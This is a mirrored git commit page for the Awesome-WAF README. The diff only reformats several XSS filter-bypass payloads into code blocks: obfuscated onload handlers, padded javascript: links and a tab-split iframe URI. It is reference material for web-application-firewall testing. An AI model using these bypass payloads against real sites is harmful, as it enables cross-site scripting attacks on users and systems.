mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-12-22 22:03:39 +07:00
Added more proper encoding
This commit is contained in:
parent
ca12c9e1d7
commit
31b5db62b4
10
README.md
10
README.md
@ -1677,7 +1677,10 @@ __Standard__: `<BODY onload=alert()>`
|
||||
__Obfuscated__: ```<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>```
|
||||
|
||||
__Standard__: `<a href=javascript;alert()>ClickMe `
|
||||
__Bypassed__: `<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe`
|
||||
__Bypassed__:
|
||||
```
|
||||
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
||||
```
|
||||
|
||||
__10. Line Breaks__
|
||||
- Many WAF with regex based filtering effectively blocks many attempts.
|
||||
@ -1703,7 +1706,10 @@ __Bypassed__: `<IMG SRC=" javascript:alert();">`
|
||||
__Variant__: `<IMG SRC=" jav ascript:alert ();">`
|
||||
|
||||
__Standard__: `<iframe src=javascript:alert(1)></iframe>`
|
||||
__Obfuscated__: `<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>`
|
||||
__Obfuscated__:
|
||||
```
|
||||
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
```
|
||||
|
||||
### Browser Bugs:
|
||||
#### Charset Bugs:
|
||||
|
Loading…
Reference in New Issue
Block a user